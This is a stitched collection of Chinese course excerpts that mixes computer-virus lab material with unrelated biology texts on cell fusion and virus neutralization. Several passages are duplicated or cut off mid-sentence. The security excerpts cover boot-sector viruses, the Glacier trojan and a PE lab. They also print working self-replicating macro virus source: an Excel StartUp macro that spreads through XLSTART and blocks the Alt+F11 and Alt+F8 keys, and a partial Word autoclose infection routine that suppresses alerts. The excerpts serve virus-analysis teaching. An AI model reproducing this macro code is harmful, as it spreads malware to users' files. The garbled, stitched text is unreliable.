引导型病毒实验原理
【实验原理】
一、主引导扇区
主引导扇区是硬盘的第一个扇区(0柱面0磁头1扇区),由主引导记录(MBR)、主分区表即磁盘分区表(DPT)和引导扇区标记三部分组成,是完成系统BIOS箱操作系统交接的重要入口。该分区在进行硬盘分区时产生,用fdisk/mbr可以重建标准的主引导记录程序。主引导扇区的具体内容为:
主引导记录占用引导扇区的前446个字节,存放系统主引导程序(负责从活动分区中装在并运行系统引导程序),不随操作系统的不同而不同,具有公共引导的特性。
主分区表占用64个字节,记录了磁盘的基本分区信息,主分区表分别为4个分区表项,每项16个字节,分别记录了每个主分区的信息,因此最多可以有4个主分区。
引导区标志占用两个字节,对于合法引导区,它等于0xAA55。
二、引导型病毒
所谓的引导型病毒,是指专门感染主引导扇区和引导扇区的计算机病毒,感染主引导区的病毒称为MBR病毒,感染引导区的病毒称作BR病毒。引导型病毒的基本原理如图2.4.4-1所示,其中13H中断如图2.4.4-2所示。如果用带毒软盘启动,首先判断硬盘是否已经中毒,未,中毒则感染之,余下的处理同图2.4.4-1所示。
图2.4.4-1引导型病毒基本原理
图2.4.4-2引导型病毒13H中断
从计算机的启动引导过程可以看出,系统BIOS完成相关检测、初始化后,读主引导扇区/引导扇区至内存固定位置0:7C00处,并转交系统控制权。控制权转角是以物理位置为依据,而不是以扇区内容为依据,转交的条件是扇区的有效标志55AA。引导型病毒正是利用这一点,通过感染主引导扇区和引导扇区,在启动系统时就获取控制权。
由于只有在启动系统时采读取引导型病毒的病毒体,因此引导性病毒要繁殖,必须主流内存,并伺机传染发作,病毒需要在内存中为自己预留空间,这就是病毒将0:413单元的值减少1KB 或nKB的目的。因为系统BIOS上电自检时,将常规内存大小存入0:413,减少nKB后,
系统将不在访问最高端的nKB内存,n一般稍大于病毒体大小。
引导型病毒还必须负责完成余下的系统正常引导,以隐藏自己。即引导型病毒在感染主引导扇区/引导扇区时,已经将被感染扇区的内容写入到其他扇区,并在FA T中标示该扇区所在簇为坏簇,防止被正常文件存储覆盖。引导型病毒在安置好自身后,读取备份的引导扇区内容,并让其完成系统正常引导。
Brain、DiskKiller、Monkey等都是引导型病毒。
宏病毒原理及防范 一、常见宏病毒 1.startup宏病毒 宏病毒其实并不神秘,其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建,新建的文件常放在xlsrt文件夹下。然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。下面先看看startup宏病毒代码吧,注意红字部分。 Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.doczj.com/doc/b517762842.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.doczj.com/doc/b517762842.html, Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub 2.book1病毒 book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。这种病毒和startup病毒工作原理相似,但启动方式不太一样,该病毒会在excel文件中添加和复制一个宏表,利用宏表4。0程序的auto_open事件启动宏表中的宏代码,进行代码复制,病毒文件创建。打开中了book1病毒文件,在插入-名称里会出现很多陌生的定义名称,这些都是病毒启动名称。 二、病毒专杀 1.手工专杀 strartup.xls病毒。首先把宏的安全性设置为最高级,禁止所有宏运行。然后在电脑中搜索xlstart文件夹,找到后把该文件夹中的strartup.xls文件
姓名班级 13级生命基地班学号同组者: 科目细胞生物学实验实验题目动物细胞融合 【实验题目】 动物细胞融合 【实验目的】 1.了解动物细胞融合的常用方法。 2.学习化学融合的基本操作过程。 3.观察动物细胞融合过程中细胞的行为与变化。 【实验材料与用品】 1、材料 鸡血红细胞 2、试剂 50%PEG、GKN溶液、Alsever’s细胞保存液、0.85%氯化钠溶液。 3、器材 倒置显微镜、离心机、载玻片、盖玻片、离心管、废液缸、滴管等。 【实验原理】 细胞融合是指在自发或者诱导条件下,两个或两个以上细胞合并为双核或者多核细胞的过程。目前人们已经发现有很多方法可以诱导细胞融合,包括:病毒诱导融合、化学诱导融和和电激诱导融合。 1、病毒诱导融合 仙台病毒、牛痘病毒、新城鸡瘟病毒和疱疹病毒等可以介导细胞的融时也可介导细胞与细胞的融合。用紫外线灭活后,这些病毒即可诱导细胞发生融合。 2、化学诱导融合 很多化学试剂能够诱导细胞融合,如聚乙二醇(PEG)、二甲基亚砜、山梨醇、甘油、溶血性卵磷脂、磷脂酰丝氨酸等。这些物质能够改变细胞膜脂质分子的排列,在去除这些物质之后,细胞膜趋向于恢复原有的有序结构。在恢复过程中想接触的细胞由于接口处脂质双分子层的相互亲和与表面张力,细胞膜融合,胞质流通,发生融合。化学诱导方法,操作方便,诱导融合的概率比较高,效果稳定,适用于动、植物细胞,但对细胞具有一定的毒性。PEG 是广泛使用的化学融合剂。 3、电激诱导融合
姓名班级 13级生命基地班学号同组者: 科目细胞生物学实验实验题目动物细胞融合 包括电诱导、激光诱导等。其中,电诱导是先使细胞在电场中极化成为偶极子,沿电力线排布成串,再利用高强度、短时程的电脉冲击破细胞膜,细胞膜的脂质分子发生重排,由于表面张力的作用,两细胞发生融合。电诱导方法具有融合过程易控制、融合概率高、无毒性、作用机制明确、可重复性高等优点。 【实验步骤】 在本次实验中采用的是化学诱导融合的方法,利用PEG使鸡血红细胞发生融合。具体实验步骤如下: 1、取鸡血2ml+2mlAlsever液,再加入6mlAlsever液,混匀后制悬液(4℃保存)【老师已做好,可直接使用】 2、取(1)中悬液1ml+4ml的0.85%的NaCl溶液,进行以下三次离心处理: ①在1200r/min下离心5min,去掉上清液,再加入0.85%的NaCl溶液至5ml; ②1000-1200r/min下离心5min,去掉上清液,再加入0.85%的NaCl溶液至5ml; ③1000-1200r/min下离心7min 【因时间关系此次实验只离心一次】 3、将离心后的沉降血球(去上清后约0.1-0.2ml)加入GKN至1-2ml,使之成为10%的细胞悬液; 4、取上述10%的血球悬液1ml,加入3mlGKN液,使每毫升含血球15000000个; 5、分别取(4)1ml+0.5ml50%PEG,(4)0.5ml+0.5ml50%PEG,(4)0.5ml+1.0ml50%PEG,混匀滴片,编号分别为①②③号溶液。在常温下2-3min后,显微镜下观察。 【实验结果】 1、实验中可观察到两个和多个细胞发生质膜融合现象,可看到不同融合状态的细胞: ①两细胞的细胞膜相互接触、粘连; ②接触部分的细胞膜崩解,两细胞的细胞质相同,形成一个细胞质的通道,呈现哑铃状; ③通道扩大,两个细胞连成一体,呈现一个长椭圆形细胞; ④细胞融合完成形成含有双核或者多核的细胞,呈圆形。 比较典型的细胞融合时的形态如下图:
引导型病毒的机理和解析
引导型计算机病毒的机理和解析 摘要:引导型病毒是什么,其技术发展,优缺点,特点以及来源,引导型病毒的机制,解析源于DOS高级版本以及Windows 9X的新型引导型病毒的结构,并提出引导型病毒的检测和防治方法。 关键词:引导区硬盘内存新型引导型病毒病毒结构防治 计算机病毒是指在计算机程序中插入的破坏计算机功能或数据,影响计算机使用并且能够自我复制的一组计算机指令或程序代码。计算机病毒具有3个基本特性:感染性、潜伏性和表现性。换句话来说计算机病毒是人为的特制程序或指令程序,具有自我复制能力,并有一定的潜伏性、特定的触发性和很大的破坏性。 计算机病毒的种类繁多,按感染方式分为:引导型病毒、文件感染病毒和混合型病毒。引导型病毒感染硬盘主引导扇区或引导扇区以及软盘的引导扇区,如大麻、火炬、BREAK等病毒。 1 引导型病毒 1.1 简介 引导型病毒寄生在主引导区、引导区,病毒利用操作系统的引导模块放在某个固定的位置,并且控制权的转交方式是以物理位置为依
据,而不是以引导型病毒寄生在主引导区、引导区,病毒利用操作系统的引导模块放在某个固定的位置,并且控制权的转交方式是以物理位置为依据,而不是以操作系统引导区的内容为依据,因而病毒占据该物理位置即可获得控制权,而将真正的引导区内容搬家转移,待病毒程序执行后,将控制权交给真正的引导区内容,使得这个带病毒的系统看似正常运转,而病毒已隐藏在系统中并伺机传染、发作。 引导型病毒进入系统,一定要通过启动过程。在无病毒环境下使用的软盘或硬盘,即使它已感染引导区病毒,也不会进入系统并进行传染,但是,只要用感染引导区病毒的磁盘引导系统,就会使病毒程序进入内存,形成病毒环境。 1.2 计算机启动过程 在分析引导型病毒之前,必须清楚正常的系统启动过程。上电或复位后,ROM_BIOS的初始化程序完成相应的硬件诊断,并设置
中和试验方法操作规程 1.目的:建立中合实验法,统一操作标准,确保产品质量。 2.适用范围:公司生物制品效价测定的中合实验。 3.责任:质检人员有按此程序进行操作的责任,质量管理部经理有检查监督的责任。 4.程序: 4.1:实验前准备 ①、9-10日龄的SPF鸡胚、病毒。 ②、样品稀释管、病毒稀释管、打孔器、镊子、5ml吸头、1ml、200ul吸头各一盒、废弃物缸、烧杯,以上物品均需灭菌处理 ③、照蛋器、电炉、旋涡混合器、5ml微量移液器、1ml微量移液器、200ul微量移液器、记号笔、酒精棉球、碘棉、打火机、蜡、玻璃棒、无菌手套 ④、实验开始前记得要使房间温度达到30摄氏度左右,房间要紫外照射30min,生物安全柜紫外照射30min准备要用的检测用品同步放在生物安全柜里紫外照射。 4.2:稀释 ①、将样品用生理盐水2倍系列稀释,使之成1:2;1:4;1:8;1:1;,1:32;1:64;1:128;1:256;1:512;1:1024......。 ②、病毒的稀释:将病毒稀释成每单位剂量含200ELD50.。例如:病毒ELD50=10-8.375/0.1ml,将病毒稀释成每单位剂量含200ELD50的稀释倍数=108.375/200=1.2*106。即将病毒稀释 1.2*106倍即为200ELD50/0.1ml。 ③、准备七根试管(或EP管),编号1-7,在1号管中加入 0.2ml灭菌生理盐水,2-7号管中各加入9ml 灭菌生理盐水.再将ELD50=108.375/0.1ml 的病毒取1ml加入1号管中震荡混匀,再从1号管中取1ml加入2号管中震荡混匀,依次10倍系列稀释至第7管。(依据最后接种量和接种鸡胚数计算出中和抗体用病毒的量,7号管可以多稀释几支备用。) 4.3:中和:将稀释成每单位剂量含200 ELD50的病毒与等量的2倍系列稀释的待检样品混合,37度中和1小时,准备接种鸡胚。
引导型计算机病毒的机理和解析 摘要:引导型病毒是什么,其技术发展,优缺点,特点以及来源,引导型病毒的机制,解析源于DOS高级版本以及Windows 9X的新型引导型病毒的结构,并提出引导型病毒的检测和防治方法。 关键词:引导区硬盘内存新型引导型病毒病毒结构防治 计算机病毒是指在计算机程序中插入的破坏计算机功能或数据,影响计算机使用并且能够自我复制的一组计算机指令或程序代码。计算机病毒具有3个基本特性:感染性、潜伏性和表现性。换句话来说计算机病毒是人为的特制程序或指令程序,具有自我复制能力,并有一定的潜伏性、特定的触发性和很大的破坏性。 计算机病毒的种类繁多,按感染方式分为:引导型病毒、文件感染病毒和混合型病毒。引导型病毒感染硬盘主引导扇区或引导扇区以及软盘的引导扇区,如大麻、火炬、BREAK等病毒。 1 引导型病毒 1.1 简介 引导型病毒寄生在主引导区、引导区,病毒利用操作系统的引导模块放在某个固定的位置,并且控制权的转交方式是以物理位置为依据,而不是以引导型病毒寄生在主引导区、引导区,病毒利用操作系统的引导模块放在某个固定的位置,并且控制权的转交方式是以物理位置为依据,而不是以操作系统引导区的内容为依据,因而病毒占
据该物理位置即可获得控制权,而将真正的引导区内容搬家转移,待病毒程序执行后,将控制权交给真正的引导区内容,使得这个带病毒的系统看似正常运转,而病毒已隐藏在系统中并伺机传染、发作。 引导型病毒进入系统,一定要通过启动过程。在无病毒环境下使用的软盘或硬盘,即使它已感染引导区病毒,也不会进入系统并进行传染,但是,只要用感染引导区病毒的磁盘引导系统,就会使病毒程序进入内存,形成病毒环境。 1.2 计算机启动过程 在分析引导型病毒之前,必须清楚正常的系统启动过程。上电或复位后,ROM_BIOS的初始化程序完成相应的硬件诊断,并设置ROM_BIOS中断和参数,调用INT19H自举。注意ROM_BIOS初始化程序已设置了BIOS中断。 对于硬盘启动,自举程序将硬盘物理第1扇(主引导记录)读到内存首址为0:7C00的区域处,开始执行硬盘主引导区程序,找到激活分区,并将该分区首扇(引导区)也读到0:7C00处(自身下移),
第23章病毒感染的实验诊断 一、教学大纲要求 (1)标本的采集、处理与运送注意事项 (2)病毒形态学检查方法 (3)病毒的分离与鉴定程序及方法 (4)病毒感染的快速诊断方法 二、教材内容精要 (一)标本的采集、处理与运送 根据临床诊断及病期采集不同的标本,用于病毒学分离和鉴定的标本应在病程初期或急性期采集,要进行预处理才能用于接种和其他方法的检测。病毒的抵抗力通常较弱,在室温下很快灭活,标本采集后应立即送到病毒实验室,暂时不能检查或分离培养时,应将标本放入冻存液并加入甘油或二甲基亚砜(DMSO)以防止反复冻溶使病毒灭活,存放在-70℃低温冰箱内保存。 (二)病毒形态学检查 1.光学显微镜 仅用于大病毒颗粒(如痘类病毒)和病毒包涵体的检查。 2.电子显微镜检查法 (1)电镜直接检查法 某些病毒感染的早期,临床标本中就可出现病毒颗粒。标本经粗提浓缩后用磷钨酸盐负染,电镜下直接观察,可发现病毒颗粒,获得诊断。 (2)免疫电镜检查法 将病毒标本制成悬液,加入特异性抗体、混匀,使标本中的病毒颗粒凝集成团,再用电镜观察,可提高病毒的检测率。本法比电镜直接检查法更特异,更敏感。 3.超过滤法 用不同孔径的火棉胶滤膜过滤病毒悬液,将获得的滤液接种于组织细胞、实验动物或鸡胚,或用血凝试验来测定病毒是否通过滤膜,从而估计病毒的大小。 4.超速离心法 根据病毒大小的不同,其沉降速度也不同。可用超速离心法测得病毒的沉降系数(S),借以计算病毒的大小。 5.X线晶体衍射法 根据X线衍射图谱,用数学方式处理来研究病毒结构亚单位和分子结构等。但标本必须为结晶,
可用于无包膜病毒的研究。 (三)病毒的分离与鉴定 1.病毒分离培养 实验室分离培养病毒的方法主要有三种:动物接种、鸡胚接种和组织培养。根据细胞的来源、染色体特性和传代次数的不同,可分为:原代和次代细胞培养,二倍体细胞培养,传代细胞培养。 2.病毒在培养细胞中增殖的指标 (1)细胞病变效应(cytopathic effect,CPE)。 (2)红细胞吸附 (3)干扰现象 (4)细胞代谢的改变 3.新分离病毒的鉴定 (1)病毒核酸类型的测定用RNA酶及DNA酶可鉴定出病毒核酸的类型。另外,DNA病毒受5-氟尿嘧啶的抑制,而RNA病毒不受影响。用此方法亦可区分DNA与RNA病毒。 (2)理化性状的检测对脂溶剂的敏感性:有包膜的病毒(如正粘病毒、副粘病毒、逆转录病毒等)含有脂类,对乙醚、氯仿和胆盐等脂溶剂均敏感,经作用后病毒失去感染性,而无包膜的病毒对脂溶剂有抵抗。耐酸性试验:肠道病毒与鼻病毒均属于小RNA病毒科,均耐乙醚。但前者可耐pH3,而后者在pH3~5环境中很快被灭活,故可将两者相区别。 (3)血清学鉴定病毒型别的最后鉴定必须依靠血清学方法。将分离的病毒与已知的诊断血清作各种试验进行鉴定。 (四)病毒的血清学检测 血清学试验是诊断病毒感染和鉴定病毒的重要手段,也是研究病毒的主要方法之一。血清学试验的方法很多,最常用的如中和试验、补体结合试验、血凝及血凝抑制试验等。 1.中和试验 中和试验是病毒型特异性反应,是指应用特异性抗体中和病毒的致病性或感染性的试验。将病人血清与一定量的已知病毒混合,作用一定时间后,接种于实验动物、鸡胚或细胞培养中,观察病毒的致病作用是否被中和而不出现感染指标。以此判断病人血清中有无特异性抗体存在。本法特异性高,但操作比较复杂,费时。主要用于鉴定病毒;分析病毒抗原的性质;测定免疫血清的抗体效价和疫苗接种后的效果;测定病人血清中的抗体,用于诊断病毒性疾病。 2.补体结合试验 特异性病毒抗原和相应的抗体结合形成免疫复合物时能结合补体。本实验操作繁琐,特异性较
第十三章 中和试验(neutralization test) 学习要点: 毒价滴定; 终点法中和试验; 空斑减少试验。 病毒或毒素与相应的抗体结合,抗体中和了病毒或毒素,失去了对易感动物的致病力,这种试验称为中和试验。 一、简单定性中和试验——毒价滴定 主要用于鉴定病料中病毒及病毒的类型,亦可用于毒素的鉴定。试验方法:根据病毒的易感性选定试验动物(鸡胚或细胞)及接种途径。将动物分为对照组与实验组。试验组:取待检病料磨碎,加生理盐水稀释,加双抗,在冰箱中作用1h或经过滤器过滤,与已知的抗血清等量混合,置于37℃中作用1h后接种动物。对照组则用正常血清加入稀释病料,作用后,接种另一种动物。对照组动物发病死亡,而试验组动物不死,即证实病料中含有与已知抗血清相应的病毒。
二、终点法中和试验 1、固定血清稀释病毒法 将病毒用2倍递增稀释,分置二列试管:第一列加入正常血清(对照组);第二列加入待检血清(试验组)。二列试管分别振荡均匀,置370C中作用1h,将各管混合液分别接种试管动物,每管用3-5只动物。接种后观察数目,并记录死亡数。观察结束后,计算起LD50及中和指数。
2、固定病毒稀释血清法 本法用以测定抗病毒的血清中和效价。将待检血清稀释,加等量已知毒价的病毒液,在试管内中和湖接种动物,观察动物发病及死亡情况,计算其只能中和效价。
三、空斑减少试验 在细胞培养时作中和试验可采用空斑减少法。一种能使细胞致病变的病毒,在细胞培养上生长后,因其致病变作用使细胞单层脱落,pH与无病变地方也不一样,该处与周围明显不同的、一个局限性的变性细胞区称为空斑。一个空斑可以当作一个病毒生长的集落,一个单位内空斑数多,病毒就多,故可测出病毒空斑形成单位。这样,加抗血清与不加抗血清的病毒空斑形成单位之差,就称为空斑减少试验。使空斑减少50%的血清西式度,就是该血清的中和价。
实验三脚本病毒和宏病毒分析 一、实验目的 通过这项实验旨在使学生掌握Office下宏病毒的基本原理,主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。 二、实验环境 操作系统环境:Windows98/NT/2000/XP 编程环境:Office VBA 三、实验基础知识要求 Office VBA编程环境 四、实验任务 1.任务性质:验证性实验 2.任务描述:下面的示例中给出的是一个Word宏病毒的示例程序(只有传染模块),仔细阅读源程序,掌握Word宏病毒的传染过程。 3.任务步骤: (1)打开Word2000,新建一个文档名为“test”; (2)点击“工具-宏-宏”,在对话框“宏的位置”选择“test”,在宏名中输入“autoclose”,然后点击“创建”按钮; (3)在VBA编辑环境中输入示例程序中给出的代码,并保存,然后退出VBA; (4)点击“工具-宏-宏”,在对话框中点击“管理器”按钮,在管理器对话框中点击“宏方案项”标签;在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”; (5)点击“工具-宏-安全性”,在安全性对话框中的安全级标签中选择“低”,在可靠性来源标签中选择“信任对VB项目的访问”; (6)保存并关闭“test”文档; (7)新建一个文档test1,关闭后重新打开,观察test1是否被感染。 (8)清除此宏病毒,即要同时删除normal模板、所有活动模板、和染毒文件的autoclose 宏。 4.示例程序 Sub autoclose() ' autoclose Macro ' 宏在2005-8-26 由jingjd 创建 On Error Resume Next Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False 'Options.VirusProtection = False Options.SaveNormalPrompt = False Const VirusName = "AOPEDMOK" 'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name 'MsgBox ActiveDocument.VBProject.VBComponents(2).Name Set Doc = ActiveDocument.VBProject.VBComponents Set Tmp = NormalTemplate.VBProject.VBComponents Const ExportSource = "E:\aopedmok.txt" For j = 1 To Doc.Count
病毒中和试验测定法 1.固定病毒稀释血清法(α法) 本法用于抗血清的中和价。试验需先滴定病毒 毒价,试验时将其稀释成每一单位剂量含200个TCID 50 ,再将待检血清倍比稀释 加等量200个TCID 50 /ml的病毒液,混匀后37℃1h,每一稀释度接种24孔细胞 培养板4孔,每孔。5%C0 2 培养箱培养一定时间后,记录出现CPE孔数,以不出现CPE数和接种数的比为中和比值。按Karber法计算中和价。其公式如下: Log TCID 50 =L+d() (TCID50用对数计算,L为病毒最低稀释度的对数。d为组距,即稀释系数,在10倍系列稀释则为-1,S为各组CPE与接种数比值之和) 50%中和试验举例 每一接种剂量含病毒 100TCID50或 100LD50或100EID50或100ID50 L=-1,d=,S=4/4+4/4+4/4+4/4+2/4= 代入Karber公式:LogND 50= -1-* 该抗血清ND 50 (半数中和单位)为,即1/160, 则其中和价为160 ND 50 /ml,可以简写成160。 2.固定血清稀释病毒法(β法) 本法用于测定抗血清的中和指数。将病毒原液10倍系列稀释,分列于2排无菌管,第一排加等量正常血清(对照组);第二排加待检血清(中和组),混匀后,置37℃1h,分别接种细胞板孔(或鸡胚、实验 动物)进行培养,记录CPE(鸡胚、动物死亡数),计算TCID 50(或LD 50 ),按下 式计算中和指数。 中和组TCID 50(或LD 50 ) 中和指数= ———————————— 对照组TCID 50(或LD 50 ) 查反对数,即得该待检血清的中和指数。通常中和指数>50者判为阳性,
目录 简介 (1) 工作原理 (1) 步骤流程 (5) 功能 (18) 清除方法 (19) 结论 (20)
简介 冰河木马开发于1999年,在设计之初,开发者的本意是编写一个功能强大的远程控制软件。但一经推出,就依靠其强大的功能成为了黑客们发动入侵的工具,并结束了国外木马一统天下的局面,成为国产木马的标志和代名词。 在2006年之前,冰河在国内一直是不可动摇的领军木马,在国内没用过冰河的人等于没用过木马,由此可见冰河木马在国内的影响力之巨大。目的:远程访问、控制。选择:可人为制造受害者和寻找"养马场",选择前者的基本上可省略扫描的步骤。 从一定程度上可以说冰河是最有名的木马了,就连刚接触电脑的用户也听说过它。虽然许多杀毒软件可以查杀它,但国内仍有几十万中冰河的电脑存在!作为木马,冰河创造了最多人使用、最多人中弹的奇迹!现在网上又出现了许多的冰河变种程序,我们这里介绍的是其标准版,掌握了如何清除标准版,再来对付变种冰河就很容易了。 冰河的服务器端程序为G-server.exe,客户端程序为G-client.exe,默认连接端口为7626。一旦运行G-server,那么该程序就会在C:/Windows/system目录下生成Kernel32.exe和sysexplr.exe,并删除自身。Kernel32.exe在系统启动时自动加载运行,sysexplr.exe和TXT文件关联。即使你删除了Kernel32.exe,但只要你打开TXT 文件,sysexplr.exe就会被激活,它将再次生成Kernel32.exe,于是冰河又回来了!这就是冰河屡删不止的原因。 工作原理 冰河木马是用C++Builder写的,为了便于大家理解,我将用相对比较简单的VB来说明它,其中涉及到一些WinSock编程和Windows API的知识,如果你不是很了解的话,请去查阅相关的资料。 一、基础篇(揭开木马的神秘面纱) 无论大家把木马看得多神秘,也无论木马能实现多么强大的功能,木马,其实质只是一个网络客户/服务程序。那么,就让我们从网络客户/服务程序的编写开始。 1.基本概念: 网络客户/服务模式的原理是一台主机提供服务(服务器),另一台主机接受服务(客户机)。作为服务器的主机一般会打开一个默认的端口并进行监听(Listen), 如果有客户机向服务器的这一端口提出连接请求(Connect Request), 服务器上的相应程序就会自动运行,来应答客户机的请求,这个程序我们称为守护进程(UNIX的术语,不过已经被移植到了MS系统上)。对于冰河,被控制端就成为一台服务器,控制端则是一台客户机, G_server.exe是守护进程, G_client是客户端应用程序。(这一点经常有人混淆,而且往往会给自己种了木马!)
《计算机病毒原理及防范技术》----秦志光张凤荔刘峭著 43.8万字 第1章计算机病毒概述 1.1.1计算机病毒的起源----第一种为科学幻想起源说,第二种为恶作剧,第三种为戏程序(70年代,贝尔实验室,Core War), 第四种为软件商保护软件起源说。 1.计算机病毒的发展历史-----第一代病毒,传统的病毒, 第二代病毒(1989-1991年),混合型病毒(或“超级病毒”),采取了自我保护措施(如加密技术,反跟踪技术);第三代病毒(1992-1995年)多态性病毒(自我变形病毒)首创者Mark Washburn-----“1260病毒”;最早的多态性的实战病毒----“黑夜复仇者”(Dark Avenger)的变种MutationDark Avenger ;1992年第一个多态性计算机病毒生成器MtE,第一个计算机病毒构造工具集(Virus Construction Sets)----“计算机病毒创建库”(Virus Create Library), ”幽灵”病毒;第四代病毒(1996-至今),使用文件传输协议(FTP)进行传播的蠕虫病毒,破坏计算机硬件的CIH,远程控制工具“后门”(Bank Orifice),”网络公共汽车”(NetBus)等。 2.计算机病毒的基本特征----1.程序性(利用计算机软、硬件所固有的弱点所编制的、具有特殊功能的程序),2、传染性,3、隐蔽性(兼容性、程序不可见性)4、潜伏性(“黑色星期五”,“上海一号”,CIH),5、破坏性,6、可触发性,7、不可预见性,8、针对性,9、非授权可执行性,10、衍生性。 1.2.2.计算机病毒在网络环境下表现的特征------1.电子邮件成主要媒介(QQ,MSN等即时通讯软件,可移动存储设备,网页,网络主动传播,网络,“钓鱼”),2.与黑客技术相融合(“Nimda”,CodeRed,”求职信”),3.采取了诸多的自我保护机制(逃避、甚至主动抑制杀毒软件),4.采用压缩技术(压缩变形----特征码改变,压缩算法,“程序捆绑器”),5.影响面广,后果严重,6.病毒编写越来越简单,7.摆脱平台依赖性的“恶意网页”。 1.2.3.计算机病毒的生命周期----1.孕育期(程序设计,传播),2.潜伏感染期,3.发病期,4.发现期,5.消化期,6.消亡期。 第2章计算机病毒的工作机制 2.1.1计算机病毒的典型组成三大模块-----1.引导模块(将病毒引入计算机内存,为传染模块和表现模块设置相应的启动条件),2.感染模块(两大功能-----1.依据引导模块设置的传染条件,做判断;2启动传染功能), 3.表现模块(两大功能----依据引导模块设置的触发条件,做判断;或者说表现条件判断子模块 2.1启动病毒,即表现功能实现子模块) 2.2.1计算机病毒的寄生方式-----1.替代法(寄生在磁盘引导扇区);2.链接法(链接在正常程序的首部、尾部、或中间)。 2.2.2.计算病毒的引导过程-----1。驻留内存,2.获得系统控制权, 3.恢复系统功能。 2.4.1.计算机病毒的触发机制----1.日期,2.时间, 3.键盘 4.感染触发, 5.启动, 6.访问磁盘次数, 7.调用中断功能触发, 8.CPU型号/主板型号触发。 第三章计算机病毒的表现 3.1.计算机病毒发作前的表现----1.经常无故死机,操作系统无法正常启动,运行速度异常, 4.内存不足的错误, 5.打印、通信及主机接口发生异常, 6.无意中要求对软盘进行写操作, 7.以前能正常运行的应用程序经常死机或者出现非法错误, 8.系统文件的时、日期和大小发生变化, 9.宏病毒的表现现象,10、磁盘空间迅速减少,11.网络驱动器卷或者共享目录无法调用,陌生人发来的电子邮件,13.自动链接到一些陌生的网站。
第十一章血清学试验 第五节中和试验 根据抗体能否中和病毒的感染性而建立的免疫学试验,称中和试验(Neutralization test)。中和试验极为特异和敏感,既能定性又能定量,主要用于病毒感染的血清学诊断、病毒分离株的鉴定、病毒抗原性的分析、疫苗免疫原性的评价、血清抗体效价的检测等。中和试验可在体内进行也可在体外进行。 体内中和试验也称保护试验,试验时先对实验动物接种疫苗或抗血清,间隔一定时间后,再用一定量病毒攻击,最后根据动物是否得到保护来判定结果。常用于疫苗免疫原性的评价和抗血清的质量评价。 体外中和试验是将抗血清与病毒混合,在适当条件下作用一定时间后,接种于敏感细胞、鸡胚或动物,以检测混合液中病毒的感染力。根据保护效果的差异,判断该病毒是否已被中和,并可计算中和指数,即中和抗体的效价。根据测定方法不同,中和试验有终点法中和试验和空斑减数法中和试验等方法。 毒素和抗毒素也可进行中和试验。其方法与病毒的中和试验基本相同。 一、终点法中和试验 终点法中和试验(Endpoint neutralization test)是滴定使病毒感染力减少至50%时,血清的中和效价或中和指数。有固定病毒稀释血清和固定血清稀释病毒两种方法。 (一)固定病毒稀释血清法将已知的病毒量固定,血清作倍比稀释,常用于测定抗血清的中和效价。 1.病毒毒价单位病毒毒价(毒力)的单位过去多用最小致死量(MLD),但由于剂量的递增与死亡率递增的关系不是一条直线,而是呈S形曲线,在越接近100%死亡时,对剂量的递增越不敏感。而死亡率愈接近50%时,剂量与死亡率呈 直线关系,所以现基本上采用半数致死量(LD 50)作为毒价单位,而且LD 50 的计算应 用了统计学方法,减少了个体差异的影响,因此比较准确。以感染发病作为指标 的,可用半数感染量(ID 50)。用鸡胚测定时,可用鸡胚半数致死量(ELD 50 )或鸡胚 半数感染量(EID 50);用细胞培养测定时,可用组织细胞半数感染量(TCID 50 )。在 测定疫苗的免疫性能时,则用半数免疫量(IMD 50)或半数保护量(PD 50 )。 2.病毒毒价测定将病毒原液作10倍递进稀释即10-1、10-2、10-3……,选择4~6个稀释倍数接种一定体重的试验动物(或鸡胚、细胞),每组3~6只(个、孔)。接种后,观察一定时间内的死亡(或出现细胞病变)数和生存数。根据累计死亡数和生存数计算致死百分率。然后按Reed-Muench法、内插法或Karber法计算半数剂量。 以TCID 50 测定为例说明如下: 按Karber法计算,其公式为lgTCID 50 =L+d(S-0.5),L为病毒最低稀释度的对数;d为组距,即稀释系数,10倍递进稀释时d为-1;S为死亡比值之和(计算固定病毒稀释血清法中和试验效价时,S应为保护比值之和),即各组死亡(感染)数/试验数相加。
防病毒实验报告 姓名:王宝 学号:08103663 班级:信安10-1班 指导教师:朱长征 2013.7
实验一PE结构分析及DOS病毒感染与清除 一、实验目的 1.熟悉PE文件结构 2.掌握DOS系统下.EXE文件病毒感染与清除方法 二、实验要求 1.实验之前认真准备,编写好源程序。 2.实验中认真调试程序,对运行结果进行分析,注意程序的正确性和健壮性的验证。 3.不断积累程序的调试方法。 三、实验内容 1)手工或编程从user32.dll中获得MessageBoxA的函数地址;1、打开lordPE软件,查找user32.dll,找到如下图: 图 1
2、右击点载入到PE文件编辑器 3、点击目录,查看目录表信息 4、用软件给出的文件位置计算器就可以得到MessageBoxA的一些信息如下:
如此就可以得到MessageBoxA的VA。又因为,文件中的地址与内存中表示不同,它是用偏移量(File offset)来表示的。在SoftICE和W32Dasm下显示的地址值是内存地址(memory offset),或称之为虚拟地址(Virual Address,VA)。而十六进制工具里,如:Hiew、Hex Workshop等显示的地址就是文件地址,称之为偏移量(File offset) 或物理地址(RAW offset)。所以偏移地址就是物理地址。这样就得到了MessageBoxA的地址了。
